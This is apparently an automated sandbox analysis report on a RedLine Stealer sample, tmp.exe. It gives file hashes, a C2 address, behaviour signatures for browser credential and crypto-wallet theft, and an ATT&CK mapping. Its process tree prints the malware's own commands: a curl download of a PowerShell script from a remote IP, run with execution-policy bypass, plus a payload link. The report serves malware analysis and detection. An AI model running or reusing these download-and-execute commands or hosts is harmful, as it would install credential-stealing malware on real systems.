Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    15-12-2022 04:25

General

  • Target

    tmp.exe

  • Size

    6KB

  • MD5

    285cbd341de6e17b42f1663245a58346

  • SHA1

    5281aa0f428bca4b5eeafda1b7eefc5735490d09

  • SHA256

    55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

  • SHA512

    4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d

  • SSDEEP

    96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Malware Config

Extracted

  • Family
    redline
  • Botnet
    SPOOFER
  • C2
    20.197.226.40:32619

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:956
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:520
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      C:\Users\Admin\AppData\Local\Temp\tmp.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
            PID:1860
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:696
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1692
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1568 CREDAT:275457 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:968

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    • Modify Registry (T1112): 1
  • Credential Access
    • Credentials in Files (T1081): 2
  • Discovery
    • Query Registry (T1012): 1
    • System Information Discovery (T1082): 1
  • Collection
    • Data from Local System (T1005): 2

Downloads
